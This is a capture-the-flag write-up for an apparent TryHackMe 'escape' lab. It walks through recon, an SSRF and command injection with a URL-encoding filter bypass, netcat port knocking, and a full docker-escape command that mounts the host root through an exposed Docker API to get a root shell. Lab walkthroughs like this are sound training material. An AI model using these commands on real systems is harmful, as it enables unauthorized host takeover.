Our devs have created an awesome new site. Can you break out of the sandbox?
Deploy the machine.
I added the machine ip to the /etc/hosts file with escape.thm as host name.
First thing first..…So lets do an Nmap on the target machine.
Nmap:
nmap -sV -sC -A -T4 -p- -oN Nmap.txt 10.10.182.52
During nmap we can see there is only two ports open. 22,80. But port 22 is stated as ‘ssh?’ that seems odd.
we can see robots.txt file has 3 disallowed entries . Lets look at port 80.
when we try to signup its shows a warning sign “ Signups are currently disabled to prevent rouge accounts”. When we check the Admin section brings up a login form. Ok… Lets try some default username and passwords like admin:password. which gives a 401: Unauthorized response.
I tried to brute force the login form………and that didn't work.
Lets do the normal stuff like Directory busting….and that too didn't work. Since gobuster shows 200 status code error. Hmmm.
Lets check the robots.txt:
User-agent: *
Allow: /
Disallow: /api/
# Disallow: /exif-util
Disallow: /*.bak.txt$
checking each directories
content of /api/
content of /exif-util
tried many combinations for /*.bak.txt…last which worked is the ‘exif-util’
content of /exif-util.bak.txt
Here we can spot something … at row 44…
const response = await this.$axios.$get(‘http://api-dev-backup:8080/exif', {
This seem to be development backup….
During my testing i found From URL tab in /exif-util had a ssrf
When i check the developer section of the browser i can see…
After trying many methods… the one that worked is command injection which still had issues because there is some type of filtering happening that gave some errors….so tried some URL encoding to bypass filtering.
we can see there is git repo. since we are not in the git directory we use — git-dir. we try to access the git log by this method.
Here we can see a flag is add in the commita3d30a7d0510dc6565ff9316e3fb84434916dee8
so lets view that commit by
--git-dir /root/.git diff a3d30a7d0510dc6565ff9316e3fb84434916dee8
Here we get our root flag but not the actual root flag.
As per the commit we viewed .. it is said to knock on ports 42, 1337,10420, 6969,63000.
Port Knocking:
For port knocking we use Netcat
nc escape.thm 42
nc escape.thm 1337
nc escape.thm 10420
nc escape.thm 6969
nc escape.thm 63000
we run a Nmap again … then we can see docker port 2375 is open
Now we have the docker port open …so lets enumerate the docker images
so lets try to exploit using the image files…by mounting the host machines files to a new container. Lets use Ngnix Image.
docker -H escape.thm:2375 run -v /:/mnt --rm -it nginx chroot /mnt sh
-H for remote host <host>:<port> (escape.thm:2375)
-v Mounting volume /:/mnt ( Mount / mnt of the container )
--rm remove the container after user exits the container
-it for interactive mode
chroot /mnt to change root directory to /mnt
sh to run shell
we get a shell where the file system is mounted. . If the shell is not stable use
Now lets find the flag
And this is the real root flag. Now lets find the first flag which is in the web app. The hint for the first flag is
‘Some well known files may offer some help’
since the docker-compose is used to create docker containers, lets look for those.
There is a folder named front in the docker-escape-compose folder.
In here there is a folder named dist which have a list of files and folders…but there is a directory named ‘.well-known’
Inside .well-known folder there is a file named ‘security.txt’ . when we view the file its says
'Ping /api/fl46 with a HEAD request for a nifty treat.'
So lets use HEAD request using curl.
We got the last flag . That is it guys….
References:
